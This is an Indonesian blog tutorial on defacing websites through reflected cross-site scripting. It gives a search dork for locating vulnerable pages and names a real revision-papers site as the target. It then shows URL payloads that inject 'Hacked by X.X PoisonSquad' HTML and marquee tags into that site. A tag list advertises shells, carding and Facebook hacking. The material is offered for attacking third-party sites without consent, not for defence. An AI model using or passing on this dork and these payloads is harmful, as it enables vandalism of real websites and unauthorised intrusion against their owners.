Cara Deface Website Dengan XSS (Cross Site Scripting)

Rabu, 14 Desember 2016

Cara Deface Website Dengan XSS (Cross Site Scripting)

13.35.00 2 Comments

HumarTutor - Cara Deface Website Dengan XSS (Cross Site Scripting).


Apa itu XSS?

XSS merupakan kependekan yang digunakan untuk istilah cross site scripting.

XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

Alasan kependekan yang digunakan XSS bukan CSS karena CSS sudah digunakan untuk cascade style sheet.

Ini gabisa buat dimirrorin, yang suka ngebut mirror LOL.

Langkah :

1. Dorking,

Dork : inurl:"/showcatrows.php?CategoryID="

2. Pilih salah satu web yang mau di xss

sad
indocyberarmy

Tag : Cara Bypass, Bypass Admin, Bypass Shell, WordPress download, Instal WordPress, WordPress.org Hacked, WordPress Vuln Theme, Plugins All In One Security, Cara Hack Wordpress, Defacer Indonesia, Indonesian Defacer, Hacked, Government subdomain hacked, Hacker Indonesia, Cara Upload Shell, Shell c99, Shell b374k, Hacker (2016), Download film hacker, Cara Carding. CSRF Online, Apa itu CSRF, Cara Hack Facebook, CSRF Exploiter Online, PoisonSquad, Hacked by, Jim Geovedi, Jquery File Upload, Formcraft, ContactForm, Hackeado Por, X.X, Owned by, Pwnd by.


3. Disini saya mencoba http://www.examsolutions.co.uk/maths-revision-papers/showcatrows.php?CategoryID=13

xss
indocyberarmy

4. Jika sudah masuk ke dalam web tersebut, untuk mencobanya adalah tambahkan " dan > setelah angka, atau pada akhir url. Dan tambahkan kode html deface kita semua.

Contoh : http://www.examsolutions.net/maths-revision-papers/showcatrows.php?CategoryID=13"><h1><marquee>Hacked by X.X PoisonSquad</marquee></h1>


Dan lihat di web wkwk

Kalian juga bisa menambahkan kode html yang lain

Contoh :

- <font color="red" size="20"> Hacked by X.X ! PoisonSquad </font>
- <i><b><u>Hacked by X.X ! PoisonSquad</u></b></i>
- dll







Title :

Cara Deface Website Dengan XSS (Cross Site Scripting)

Reviewed by

Humar

On

13.35.00

Rating :

5

Share this

Humar

I'm a blogger wannabe, programmer wannabe, and hacker wannabe

2 Responses to "Cara Deface Website Dengan XSS (Cross Site Scripting)"

Silahkan berkomentar jika ada yang kurang paham tentang artikel di atas.
Jangan lupa centang "Beri tahu saya" untuk mendapatkan update balasan dari kami dan berkomentarlah dengan sopan.
Terima kasih.

Langganan: Posting Komentar (Atom)